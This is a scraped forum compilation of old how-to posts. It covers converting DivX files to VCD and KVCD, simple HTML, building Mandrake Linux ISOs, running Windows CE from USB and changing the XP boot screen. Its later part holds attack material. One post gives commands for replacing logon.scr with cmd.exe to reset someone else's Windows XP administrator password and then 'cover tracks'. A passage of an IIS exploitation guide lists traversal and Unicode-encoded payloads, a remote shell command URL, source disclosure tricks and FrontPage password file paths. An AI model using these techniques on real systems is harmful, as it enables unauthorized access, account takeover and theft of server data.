how to make a VCD from a DivX

Tools required: Latest Virtual dub, TMPGEnc and Nero ( and the DivX codecs.)

Preparing:


Download all tools, Be sure to install DivX 3.11 DivX4 and the latest DivX5 codecs.

Extracting the audio : Start Virtualdub. Open your video File->Open video file.(if you get any warnings just ignore them because you won't edit the video just extract the audio)


Select File->File Information and note the fps as the video source fps because you will need it later.


Select under Audio->Full processing mode.


Select Audio->Compression and select <No compression (PCM)>


Select Audio->Conversion.


Change the the Sampling rate to 44100Hz if you are going to make VCD or SVCD MPEGs.


Save the wav by clicking on File->Save WAV...the wav will be a huge audio uncompressed video file(about 10 MB/minute.


Encoding:


Start TMPEnc. Press cancel if the Project Wizard comes.


Press Browse… and select the DivX file as Video source input.


Now you press the Browse button for choosing the Audio source input and use the saved wav file.


Press load and load the file which in the Template directory of TMPGenc.


If the video source fps is 29,970 load VideoCD (NTSC).mcf


If the video source fps is 23,970 load VideoCD (NTSCFilm).mcf


If the video source fps is 25,000 load VideoCD (PAL).mcf


If the video source fps is anything else else just load NTSC if you live in US or Japan and PAL if you live anywhere else.


Note if you live in US or Japan and get problem playing PAL, often causing black and white TV playback problems, then first check if you can change to PAL on your TV or DVD Player if not then instead convert it to NTSC by loading the VideoCD(NTSC) template.


Note if you live Europe and the rest of the world and get problem playing NTSC or NTSCFilm, often causing black and white TV playback problems, then first check if you can change to PAL on your TV or DVD Player if not convert it to PAL by loading the VideoCD(Pal) template.

Press Settings and choose Advanced.


Select Full screen (keep aspect ratio) under Video arrange method to keep the same aspect ratio(widescreen,fullscreen) as the video source(if you have a widescreen movie and you want it to be in fullscreen select No margin(keep aspect ratio).


Select Source range and double-click on it with the mouse.

In the next dialog you can choose the source range. This process depends on the DivX file. If the DivX file is less than 80min (for a 80min/700mb CDR) then you do not have to split the file to two CDs. Also if the DivX file is already in two parts you have just to convert the first file and then the second. But if there should be the case that the movie is in one file over 80minutes long then it is necessary to select the source range. In this new dialog you put the horizontal scrollbar to the middle of the selection so that you will get the same length on the first CD as on the second. After you selected the middle do you have press Set end frame. A new value should be under End Frame. This value you should notice somewhere for the encoding of the second part. Of course the start frame must be 0.

After pressing ok, you only have to select the output file name. I prefer the movie name with the CD number (e.g. Ghost in the Shell CD1) for the burning.


Now encode the file by pressing the Start-Button.


While encoding you can select File->Preview(it won't effect the encoding) to see how the output will be, it it looks wrong(widescreen or fullscreen) you can stop the encoding and start over and change especially the Settings->Advanced->Video arange method.)


If you only want to burn the movie on one CD jump to the burning guide else follow the next points.

Repeat the third, forth and fifth point. In the source range dialog you now use as Start frame the noticed value and move with the horizontal scrollbar to the end of the movie.


After pressing Set end frame, press two times OK.

Now select the output filename for the second file. (e.g. Ghost in the Shell CD2) and encode it.


After the encoding is done and you did all right, you should have for every CD a file.

Burning:


Launch Nero.Close the Wizard. Select File->New.


1. Select VideoCD


2. Select PAL or NTSC depending what format your source MPEG is in.


3. And hit New.

1. Locate your .mpg and drag it(see picture below). Remember that you can add several .mpgs also, each mpg will be a own track on the VCD and you can add data files also, just drag them to any folder.


2. Check the time. It should be the same as in the movie.

3. Rename the CD to anything you like by clicking F2 on NEW.

4. Select File->Write CD.

don't know about everyone else.. but the only options i choose on tmpgenc to make mpeg-1 files are either NTSC film 23.976, or NTSC video 29.97 fps..

i also live in the u.s. so i do all of mine accordingly.. why do you save the wave file with virtual dub.. or should i say, why do you even process the divx file with vdub.. yeah if it is your last resort and the divx for some reason doesn't open in tmpgenc.. i've got 180+ Divx movies, some downloaded mostly ripped, never had a problem encoding them with tmpgenc plus.

just seems like you are going from your a$$ to your elbow to do this.

1. take divx movie (120 minutes long for example).. open with vdub.. find a keyframe about halfway through the film, preferrably at a scene change.

choose "SET SELECTION START" from the EDIT menu.. scroll all the way to the end of the film, choose "SET SELECTION END"... hit DELETE or choose "DELETE SELECTION", all from the EDIT menu

2. Now you have 1 half of your movie. under the VIDEO menu, choose "DIRECT STREAM COPY", also make sure that under AUDIO is going to generate a "DIRECT STREAAM COPY". Then go to FILE and choose "SAVE as AVI..."

on a newer computer this will take less than 2 minutes..

3. When it is complete, the quickest way to proceed is to just click on FILE / "OPEN VIDEO FILE". at the beginning of the clip, choose "SET SELECTION START" again, snap back to the keyframe (half way through the film) which you cut half the film off at and choose "SET SELECTION END". DELETE... FILE / "SAVE AS AVI..." save as the other half of film..

once again, will usually take less than 2 minutes...

4. choose option accordingly, this next part can be important.. (i'm going to give the rest of the instructions as if you were making ntsc movie)

since you want to make a standard mpeg-1 file, choose NTSC FILM or NTSC VIDEO.. BROWSE for your file, then hit NEXT, then it OTHER SETTINGS / ADVANCED tab ... now there is an option that says "VIDEO ARRANGE METHOD".. if you are making a fullscreen movie, lleave on FULLSCREEN.. if you are encoding a widescreen movie, choose "FULL SCREEN (KEEP ASPECT RATIO).. OK / NEXT / NEXT (you get the point)

basically takes 1 step out of the tutorial above.. the instructions for nero appear to be correct.. but here's another tip..

dvd burners are becoming more and more popular and even i got one now, like many of you do. tired of old vcd's or wanna encode a VCD standard DVD with nearly 9 hours of video (but same quality as normal 80 minute VCD),

if this is the case, make sure you encode your DivX files as "NTSC VIDEO 29.97 FPS".. even if source is 23 fps... and once you have 3 or 4 movies, get yourself a proggy called TMPGENC DVD AUTHOR.. make a track for each movie.. and you got yourself a dvd with 3 or 4 average length movies on 1 dvd (with menus if you like) that is WAY MORE COMPATIBLE than a VCD..

do a search for the keyword VCD-DVD and i posted a more descriptive tutorial on how to do this..

how to make a new web site

how to make a new web site

WWW.blogger.com


easy and simple to make a web blog fast to try.......

http://www.make-a-web-site.com/


http://www.pagetutor.com/pagetutor/makapage/index.html


www.webmonkey.com

Colour Palletes


http://colormatch.dk

HTMLlock <---Need

http://www.devside.net


http://www.devside.net/download/crypto/disclaimer1.html

well, if you want text seperate from image, you could just do this:

<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">


<td><td>

your text here, it's totally fun, yeah yeah yeah

</td><td>

<img src="your picture here">

</td></tr>


</table>

if you want to have the image on the left side, and text on the right side, just reverse the code like so:

<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">


<td valign="bottom" align="left">

<img src="your picture here">

</td>

<td><td>

your text here, it's totally fun, yeah yeah yeah

</td></tr>


</table>

How To Make A Kvcd

how to make a kvcd or in other words how to get 700meg avi file down to about 450megs to make


a vcd without any picture loss

so youve download a movie its in avi format you want to watch it on your dvd player so


you reencode it it comes out to about 1100 maybe 1200 megs so you got to split it and save on


2 disks well the following tut will show you how to do it on one disk

first you are going to need some tools

virtualdub

CODE


http://heanet.dl.sourceforge.net/sourceforge/virtualdub/VirtualDub-1.5.10.zip

heada3che

CODE


http://mitglied.lycos.de/darkav/download/headac3he-0.23a.rar

and some dlls

CODE


http://mitglied.lycos.de/darkav2/download/MPAlib_MMX-1.00(1.50).rar


http://mitglied.lycos.de/darkav2/download/ssrc_MMX-1.01(1.28).rar


http://mitglied.lycos.de/darkav2/download/Vorbis_MMX-1.20(1.74).rar


http://mitglied.lycos.de/darkav2/download/Lame_enc_MMX-1.28(3.93).rar


http://mitglied.lycos.de/darkav2/download/MP2enc_MMX-1.15(1.13).rar

put the above dlls in the same folder as heada3che

besweet

CODE


http://dspguru.notrace.dk/BeSweetv1.4.zip


http://dspguru.notrace.dk/BeSweetGUIv0.6.zip

put these 2 in the same folder

you will have to have nero as well but im hoping you have that already if not it on this forum

tmpegnc

again its on this forum

you will need some templates

CODE


http://www.kvcd.net/dvd-models.html

right click all the pal templates if your dvd player is pal or ntsc if ntsc

save them to the template folder in the tmpegnc folder

so to begin

open virtualdub

goto file


open video file

locate the avi file you want to convert


if you get a warning ignore it


click the audio button at the top


make sure source audio and direct stream copy have a black dot next to it


goto file


save wav


now you have to call this with a .ac3 extension


for example view from the top.ac3


i would save this in the same file your avi is


so youve named it press save


box will open let it do its thing this is taking the sound from the film


now press audio and select no audio


you should have a black dot next to no audio and direct stream copy


goto video


select direct stream copy


goto file save as avi


save the file what you want again put in the same folder as the original avi


to make life easier i call mine the film title no sound ie viewfromthetopnosound


press save


this is now saving the film without sound

you can now close virtualdub

open besweet


scary looking box appears


dont worry heres what to do


at the besweet.exe locate the besweet folder it will show besweet.exe in the enter file name box


click on this and at the bottom it will say valid press ok


now goto input and find the ac3 file we just made you will need to change the enter file name from .Lst to .ac3


double click on the ac3 file you made and at the bottom it will say valid press ok


now looking at the gui make sure Use ac3 decoder is tick


downconvert sample rate is ticked


in the toolame dropdown box make sure it says mp2 leave the rest alone


now press copy command to clipboard


goto start


run


and right click paste


press ok


if all the settings are correct a black box will open and the ac3 will be transcoding to mp2


if not check the boxes are ticked


if ok leave it to do its thing


once the black box has disappered close besweet

open heada3che


hopefully you put all the dlls in the heada3che folder other wise you will get error messages


so make sure you do that


done it ok lets go


press source file


find the new mp2 file we just made


change the destination format to mp2


press start


thats it once its finished close headac3he

for your info


things are going to start looking messy inside your folder so if you want


you can delete some things


goto the folder where youre original avi file is


you can delete the ac3 file


and the mp2 file without the .2 in it


ie you will have two file names the same one with .2 on the end keep this one


this is so we dont get confused later

open tmpegnc


close the wizard if it opens


press the video source browse button


find the file we made with nosound on the end ie viewfromthetopnosound


now if you had gone to the kvcd page and downloaded all the templates this will help


if not go do that now


done it right lets go


now im afraid im not in front of your pc doing this for you so i hope i explain well


press load


you will see a load of files in front of you some starting with kvcd


right this is trial and error stuff now pick the first one begining with kvcd highlight it press open


now press start what will happen is the preview box in front of you will start encoding


now depending on the make up of the original avi file will effect the outcome of the finished film


so if you look at the box and all you see is a tiny box with film thats the size it will come out


if it looks weird press stop and reload a different template the best result is one that looks like widescreen


i hope that made sense

just press start and overwrite the file


any way let it do its thing depending on your pc specs depends how long this takes

so lets assume its done


press file mpeg tools the first box should be simple multiplex press the video input browse button


and find the new file we just made it will have a m1v extension


press the audio input browse button find the mp2 file with the .2 in the title the output


box will be automatically set to mpeg


press run


let it do its thing

close tmpgenc

open nero


select vcd


untick the create standard compliant cd


press new


find the new file we have made it will be in the original avi folder but will have a mpeg extension


now you have to drag this into the left box dont right click and copy to compliation


a box will appear and a blue line will go across if a warning comes up with not being a compliant vcd ignore carry on


press burn and burn at the speed you want


once finished press the ok box


press done the disk will come out and now to test


put it in your dvd player and hay presto the film kicks in

depending if your dvd player can play vcds that is

0NLY3DUC4T10N

How To Make 5cds, 10cds Or 2dvds From Official Dow, These are same as Mandrake PowerPack+

Download the full official tree. It comes in at over 5 gig. The full tree includes the usual mandrake, 3 gig of extra apps under contrib and 330meg of java apps under contrib/jpackage.

After downloading I have successfully created 4 versions including the Hard Drive Installation.

1) Hard Drive/Network/FTP Install (same thing)


2) 10 CD version including everything


3) 5 CD Version (use to be 4 CDs. This will eventually be the ISO download)


4) 2 DVD Version which includes everything int the 10 CD Version.

Additionally I have discovered that Mandrake is stressing everyone for no apparent reason. The much talked about 8 meg boot.iso file that is needed to be able to boot and chose your method of installation, is no different from the regular boot files that come on CD1 of any version.

The only thing you have to do is to edit the file "isolinux.cfg" in the isolinux folder. Inside the file, remove all instances of "automatic=method:cdrom" and save the file. Then create the images for whichever "version" of mdk10 that you choose. To create the different versions that I have listed above you have to do 2 things first:

1) edit the "hdlist" file in the "Mandrake/base" folder. In this file you will find a list of all the hdlist.cz files needed to build a particular version. Remove the 3 lines for "SRPM" files. Now depending on which version you want to create, the 10CD and the DVD versions will have 3 lines.


a) hdlist.cz Mandrake/RPMS Installation CD


hdlist2.cz Mandrake/RPMS2 Contrib CD


c) hdlist3.cz Mandrake/RPMS3 Jpackage.org


take note of the paths above. if you downloaded the whole tree like I did, you will have these folders. The RPMS folder is the standard 4 or 5 CD download version. The RPMS2 and RPMS3 folders added to the RPMS folder make the 10CD and DVD version. So to make the 5CD version, remove the last two lines. Dont forget to backup the original "hdlists" file.

2) To make the 10 CD or 2 DVD version, use the "mkcd"command below. Use 716800000 discsize for the 10CD version and 4000000000 for the 2 DVD version. When the command finishes, the images will be in the directory you specified after the -t option.

To make the 5CD version, move the folders "RPMS2" and RPMS3" someplace safe and don't forget to remove the last two lines in the "hdlists" file as described above. The RPMS2 and RPMS3 folders are only links so it should take no time at all to move them. Then use 716800000 discsize and run the "mkcd" command. Don't forget to move the RPMS2 and RPMS3 folders back to their original location when you finish your 5CD images.

Also rememeber that you will need plenty of disc space if you wantto keep all the images for all version on your hard drive. I have the 10CD, 5CD, 2 DVD and the HD install files all on my hard rive and they take up 23GIG.

mkcd --discsize 716800000 -t ./5CD-Version -a -s ./hdinstall

--discsize is the size of the image you want to make in bytes. the above figure is for a 700M CD. I used 4000000000 (9 zeroes) to make 2 DVDs.

-t <path to where yu want to make the images>

-a means automatic creation based on the hdlist files and the downloaded directory structure. It keeps you from having to use many other ugly options on the command line.

-s <source directory of mdk10> this is the top fodler not thr RPM folder. This top folder will have the "Mandrake" folder in it.

original Link


CODE


http://linuxiso.org/forums/viewtopic.php?t=18140

How to Install and run Windows CE on your USB Stick

How to: Install and run Windows CE on your USB Stick

Portable Windows CE is a 'launcher' for the Windows CE device emulator that can run an emulator-based image from a USB keychain.

Download the Windows CE 5.0 Device Emulator.


Code:


http://www.Mcft.com/downloads/details.aspx?FamilyID=A120E012-CA31-4BE9-A3BF-B9BF4F64CE72&displaylang=en

Change "Mcft" in link to what it is supposed to be icon_wink.gif

Extract the emulator to a folder on your hard drive by running "setup /a". The installer will prompt you to specify a directory to extract to . For example: D:\PortableCE

Download this launcher script:


Code:


http://www.furrygoat.com/Software/launchce.cmd.txt

Copy the following launcher script to the directory you extracted the setup to. You'll need to rename the file from launchce.cmd.txt to launchce.cmd


Once you have that set up, just copy the entire D:\PortableCE folder over to your USB keychain.

To launch the emulator, just plug in your USB keychain, navigate to the PortableCE folder, and run launchce.cmd. You should (hopefully) have the emulator fire up.

How to hack-change your Windows XP Boot Screen

How to hack/change your Windows XP Boot Screen

HACKING THE XP BOOT SCREEN

This is a very simple trick to do if you have done the same for the logon screen and the start button. There are 2 ways to do this trick that I know about one is doing it manually and the other is using a program called bootxp. I am going to tell you the manual way to do it, but if you want to know the other way just let me know, so I can do an update to the guide. Now once you have downloaded your ntoskrnl.exe file save it a general location so that you will have easy access to it, like my folder.

Once you have ntoskrnl.exe file in an easy access folder, restart your pc into safe mode. Once into safe mode go to the folder where your files are located.

Now that you are there copy the file that you want to change your boot screen too. Once you have copied that file, hit the window key + r or type %windir%\system32 in the run command, so that folder as follows.

Once there paste your new file into the folder and overwrite the existing folder.

Now that you have your new file in the folder restart your pc as you normally would and your new boot screen should appear. You can download this bootscreen here.

ALWAYS BACKUP EVERYTHING YOU EDIT OR DELETE. I'M NOT RESPONSIBLE IF YOU MESS YOUR COMPUTER UP BY DOING THIS HACK OR ANY TYPE OF HACK. DO IT AT YOUR OWN RISK.

Image and ntoskrnl.exe files provided by www.themexp.org

or


u can go to

code:

http://www.overclockersclub.com/guides/hackxpbootscreen.php

onlyeducation

How To Hack Windows Xp Admin Passwords

How to hack Windows XP Admin Passwords the easy way by Estyle, Jaoibh


and Azrael.


------------------------------------------------------------------------------


This hack will only work if the person that owns the machine


has no intelligence. This is how it works:


When you or anyone installs Windows XP for the first time your


asked to put in your username and up to five others.


Now, unknownst to a lot of other people this is the only place in


Windows XP that you can password the default Administrator Diagnostic


Account. This means that to by pass most administrators accounts


on Windows XP all you have to do is boot to safe mode by pressing F8


during boot up and choosing it. Log into the Administrator Account


and create your own or change the password on the current Account.


This only works if the user on setup specified a password for the


Administrator Account.

This has worked for me on both Windows XP Home and Pro.


-----------------------------------------------------------------------------


Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt


then enter this set of commands Exactly:


(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work


on the welcome screen of a normal booted machine)


-----------------------------------------------------------------------------


cd\ *drops to root


cd\windows\system32 *directs to the system32 dir


mkdir temphack *creates the folder temphack


copy logon.scr temphack\logon.scr *backsup logon.scr


copy cmd.exe temphack\cmd.exe *backsup cmd.exe


del logon.scr *deletes original logon.scr


rename cmd.exe logon.scr *renames cmd.exe to logon.scr


exit *quits dos


-----------------------------------------------------------------------------


Now what you have just done is told the computer to backup the command program


and the screen saver file, then edits the settings so when the machine boots the


screen saver you will get an unprotected dos prompt with out logging into XP.


Once this happens if you enter this command minus the quotes


"net user <admin account name here> password"


If the Administrator Account is called Frank and you want the password blah enter this


"net user Frank blah"


and this changes the password on franks machine to blah and your in.

Have fun


p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks


Any updates, Errors, Suggestions or just general comments mail them to either

goodluck...only education

Guide to IIS Exploitation

***************************************************************************


* Guide to IIS Exploitation *


* by fugjostle *


* *


* V.1.0.1 *


* *


* Questions? Comments? Email: fugjostle at ch0wn.com *


***************************************************************************

Disclaimer: I do not condone hacking IIS servers in any way,


shape or form. This guide is intended as a guide


for admins to help them understand what most


script kiddies don't understand but are happy to


exploit.

--[On the first day, God created directory traversal]

Relative paths are the developers friend. They allow an entire website to


be moved to another directory without the need for changing all the links


in the html. For example, lets say we have a webpage called 'pictures.html'


in the htdocs dir:

Absolute path: /home/webpages/htdocs/pictures.html


Absolute path: /home/webpages/images/pic1.gif

In the html you can refer to the 'pic1.gif' via an absolute path shown


above or use a relative path:

Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent


directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then


the server goes into the images dir and looks for the gif file to display.

Anyone who has used the 'cd' command in DOS and *nix should be familiar


with the operation. So what's the problem I hear you ask... well, the


programmers of web server didn't think to check the supplied URL to ensure


that the requested file was actually in the web directory. This allows


someone to backtrack through the servers directory structure and request


files that the web server has access to. For example,

http://www.target.com/../../../etc/passwd

NB. you can also use double dots and double quotes. This is useful to evade


Intrusion Detection Systems (IDS):

http://www.target.com//....//....//...././etc/./passwd

The webserver simply strips the extra stuff out and processes the request.


This is the same as the previous example and can make string matching IDS's


work for their money.

--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake they began to create parser


routines to check for naughty URL's and keep the requests within the


document root. Then along comes a wiley hacker who wonders if by encoding


the URL will it still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space it is


replaced with the hex equivalent (%20):

http://www.target.com/stuff/my index.html

becomes

http://www.target.com/stuff/my%20index.html

and voila, it works. So what would happen if we changed the now denied URL:

http://www.target.com/../../../etc/passwd

to

http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd




The parser routine checks for the existence of dots in the path and finds


none... the webserver then proceeds with the request.

An interesting feature is that you can encode the hex symbol and the web


server will decode it all for you. This is called the "double decode".


For example, given the URL "http://victim.com/..%252f..%252fdocs/", the


following will take place:

(1) On the first decode, the string will be converted to:

"http://victim.com/..%2f..%2fdocs/"

[%25 = '%' so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to:

"http://victim.com/../../docs/"

[%2f = '/']

--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally


interoperable. This raised the question of how to deal with all the different


character sets around the world. As a response to this, Unicode was created:

-----------------------------------------------------------------


Unicode provides a unique number for every character, no matter


what the platform, no matter what the program, no matter what


the language. The Unicode Standard has been adopted by such


industry leaders as Apple, HP, IBM, JustSystem, Microsoft,


Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is


required by modern standards such as XML, Java, ECMAScript


(JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official


way to implement ISO/IEC 10646. It is supported in many operating


systems, all modern browsers, and many other products.


-----from http://www.unicode.org---------------------------------

The problem with Unicode is that it requires 16 bits for a single character


and software tended to use 8 bits for a single character. Unicode TransForm


using 8 bits (UTF-8) was created. This allows for multibyte encoding where a


variable number of bytes can be used for each character:

Character 1-byte 2-byte 3-byte


. 2E C0 AE E0 80 AE


/ 2F C0 AF E0 80 AF


\ 5C C1 9C E0 81 9C

This lead to a new vulnerability in certain webservers. The parser didn't


understand this new encoding and allowed it through :-)

For example:

www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd

Recent vulnerabilities have been taking advantage of the fact that the web


server doesn't understand the Unicode UTF-8 character set but the underlying


OS does:

www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir

Understanding the distinction between Unicode and UTF-8 can be difficult. As


a general rule of thumb you can use the following format as a guide:

%uxxxx = Unicode


%xx%xx = UTF-8


%xx = Hexidecimal


%xxxx = Double Decode

--[On the fourth day, God created default installs]

IIS comes installed with various DLL's (Dynamic Link Libraries) that


increase the functionality of the web server. These ISAPI (Internet Server


API) applications allow programmers/developers to deliver more functionality


to IIS.

The DLL's are loaded into memory at startup and offer significant speed


over traditional CGI programs. For example, they can be combined with the


Internet Database Connector (httpodbc.dll) to create interactive sites that


use ODBC to access databases.

The problem is that some of these DLL's are insecure and are often installed


with sample scripts that demonstrate how to exploit, erm, I mean use them.

ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active


Server Pages) are basically HTML pages with embedded code that is processed


by the webserver before serving it to the client.

Here's some examples to illustrate how the sample pages installed by default


can aid someone breaking into your site via the ASP.DLL:


[prefix all the examples with http://www.target.com]

/default.asp.

** Appending a '.' to the URL can reveal the source


** on older systems. Remember hex encoding? You can


** also try using %2e to do the same thing.

/msadc/samples/adctest.asp

** This gives you an interface into the msadcs.dll


** and allows creation of DSN's. Read RFP's stuff


** for idea's on how to exploit this.

/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini


/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini

** You can view the source of anything in the


** document root. '/msadc/' needs to be in the


** request as it is checked for, wait for this,


** security :-)

/index.asp::$DATA

** Appending '::$DATA' to the URL can reveal


** the source of the ASP.

/index.asp%81




** Append a hex value between 0x81 and 0xfe


** and you can reveal the source of any server


** processed file. This only works on servers


** that are Chinese, Japanese or Korean.

/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|

** This one allows you to execute remote


** shell commands ;-)

ISM.DLL is used to process requests that end in ".htr". These pages were used


to administer IIS3 servers. In IIS4 they are not used but various .htr samples


are installed by default anyway and offer another avenue for entry.

/index.asp%20%20%20..(220 more)..%20%20.htr

** IIS will redirect this request to ISM.DLL,


** which will strip the '.htr' extension and


** deliver the source code of the file.




/global.asa+.htr

** Does the same thing as the %20%20 exploit


** above. ISM.DLL strips the +.htr and delivers


** you the source of the file

/scripts/iisadmin/ism.dll?http/dir

** Excellent brute force opportunity if the


** dll exists. Successful logons will reveal


** lots of useful stuff.

/iisadmpwd/aexp.htr

** The iisadmpwd diectory contains several .htr


** files that allow NetBIOS resolution and


** password attacks.

/scripts/iisadmin/bdir.htr??c:\inetpub\www

** This method will only reveal directories


** but can be useful for identifying the


** servers structure for more advanced


** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS


(Remote Data Service). RDS is part of the default install of Microsoft Data


Access Components (MDAC) and is a commonly exploited on IIS. It can allow


arbitrary shell commands to be executed with system privileges.

/msadc/msadcs.dll

** If this file exists then there's a pretty


** good chance that you can run the RDS


** exploit again the box. More on this later.

HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the web


server wants to connect to a database. It allows the creation of web pages


from data in the database, and it allows you to update/delete items from


within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLL


for processing.

/index.idc::$DATA

** Appending '::$DATA' to the URL can reveal


** the source of the IDC.

/anything.idc




** Requesting a non-existance file will


** reveal the location of the web root.

/scripts/iisadmin/tools/ctss.idc

** Creates a table based on the parameters it


** receives. Excellent place to look at for


** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). '.stm',


'.shtm' and '.shtml' extension are sent to the DLL which interprets


the SSI statements within the HTML before sending it to the client.

An example of SSI would be:

<!--#include file="news.txt"-->

This SSI tells the server to include the 'news.txt' in the final HTML


sent to the use. SSI statements are beyond the scope of this document


but offer another security hole open to our wiley hax0r. Ensure you


remove the app mapping and disable SSI if you do not require its


functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow, read the


following advisory for details:

http://www.nsfocus.com/english/homepage/sa01-06.htm

Some examples of SSINC.DLL fun:

/anything.stm

** If you request a file that doesn't exist


** then the server error message contains the


** the location of the web root.

/somedir/anything.stm/somedir/index.asp

** Using this method allows you to view the


** the source code for index.asp.




IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'


requests. This DLL has had some big exposure with the recent Nimda worm.


I'm not going into too much detail but '.ida' was used in a buffer


overflow that resulted in user defined code being executed on the server.

/anything.ida or /anything.idq




** Requesting a non-existance file will


** reveal the location of the web root.

/query.idq?CiTemplate=../../../boot.ini

** You can use this to read any file on


** the same drive as the web root

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your


IIS server, via a web browser or the Web Publishing Wizard. The existance of


this DLL can allow attackers upload files to the server. Other files such as


uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site


Server and allow upload of documents to the server:

/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

** If this file is there then you may be able


** to upload files to the server.

/scripts/uploadn.asp




** Connecting to this page gives you a nice


** gui for uploading your own webpages. You


** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few


of them are very, very insecure. Microsoft recommends that you remove ALL


samples from any production server including the ExAir, WSH, ADO and other


installed samples.

IIS Default Web Site


--------------------


IISSAMPLES - c:\inetpub\iissamples


IISADMIN - c:\winnt\system32\inetsrv\issadmin


IISHELP - c:\winnt\help


SCRIPTS - c:\inetpub\scripts


IISADMPWD - c:\winnt\systems32\inetsrv\iisadmpwd


msadc - c:\program files\common files\system\msadc


logfiles - c:\winnt\system32\logfiles


default.htm - c:\inetpub\wwwroot

IIS Default App Mapping


-----------------------


.asa - c:\winnt\system32\inetsrv\asp.dll


.asp - c:\winnt\system32\inetsrv\asp.dll


.cdx - c:\winnt\system32\inetsrv\asp.dll


.cer - c:\winnt\system32\inetsrv\asp.dll


.htr - c:\winnt\system32\inetsrv\ism.dll


.idc - c:\winnt\system32\inetsrv\httpodbc.dll


.shtm - c:\winnt\system32\inetsrv\ssinc.dll


.shtml - c:\winnt\system32\inetsrv\ssinc.dll


.stm - c:\winnt\system32\inetsrv\ssinc.dll

--[On the fifth day, God created Frontpage Extensions]

Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've


ever wondered why they use _vti_) is a web design tool that helps you


create and maintain a web site and allows you to publish it to the web


server.

In order to publish using Frontpage the server needs to run certain


programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in


Frontpage. You can list all the files, download password files and upload


your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to


get all the information it needs to publish:

http://www.myserver.com/_vti_inf.html

Then Frontpage uses the following URL to POST the files to the site:

http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc

It will come as no surprise that this file is not protected and open to


abuse.

All information for the site is stored in the /_vti_pvt/ dir, and its world


readable. Here's some of the things you can look for:

http://www.myserver.com/_vti_pvt/administrators.pwd


http://www.myserver.com/_vti_pvt/authors.pwd


http://www.myserver.com/_vti_pvt/service.pwd


http://www.myserver.com/_vti_pvt/shtml.dll


http://www.myserver.com/_vti_pvt/shtml.exe


http://www.myserver.com/_vti_pvt/users.pwd


http://www.myserver.com/_private

--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external


applications to the web server. A CGI program is excuted in real time and


is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed


anywhere. The programs can be written most languages but typically they are


written in C, Perl or shell scripts.

Many sites will use freely available, downloadable scripts from places like


Matt's Trojan, erm, I mean Matt's Script Archive. Its always a good idea to


look through the source of the scripts for bad system calls and lax input


validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read


the following tutorials... they explain it better than I ever could:

Hacking CGI - http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt


Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07

Just to get you in the mood we will have a brief look at CGI exploitation.


There are three main types of CGI hacking; URL encoding attacks, input


validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit cgi


using the techniques from previous sections. First, we need to cover some


background. CGI can take lots of shapes and forms. One popular use is via


web based forms that submit information to a CGI via a GET or POST.

<FORM NAME="myform" "METHOD=GET" ACTION="../cgi-bin/my_cgi.cgi">

When the user clicks on the submit button his information is passed to the


CGI script to process either via the URL (GET) or via HTTP headers (POST).


Lets assume that the CGI we are going to exploit asks the user for the name


of a file to display. The 'GET' method uses the URL to pass the information


and it would look like this:

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd

Lets break that down:

? - separates the request from the parameters


filename - this is the name of the textbox in the html


= - assignment for the parameter/value pair


/etc/passwd - this is what the user typed into the box

You can have multiple fields within a HTML form and these will also be


passed to the CGI. They are separated using a '&':

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle

If you were thinking how could you alter the user supplied input to break


the CGI then good, you're starting to think in terms of security. Lots of


developers love to program new and interesting things but they do not


consider security. A security conscious programmer would write input


validation routines that would process the data and ensure the user wasn't


be malicious or curious.

As you read through some of the free scripts on the web you will start to


realise that many programmers do not think about security. Lets look briefly


at some ways we could exploit the CGI. The first thing to keep in mind is


that you already know the generic exploits from the previous section. The


only area in which we are lacking is programming language specific info.

We will stick with the example cgi that open's a file (and let's assume


its written Perl). Lets look at some of the things we can try:

my_cgi.pl?filename=../../../../../etc/passwd

and lets do the same thing but encode the URL to bypass security checks:

my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with


poison null bytes. Stop now and go read it... can't be arsed? ok then,


here's the quick version. %00 is valid in a string with Perl but is NUL


in C. So? When Perl wants to open the file it makes a request to the

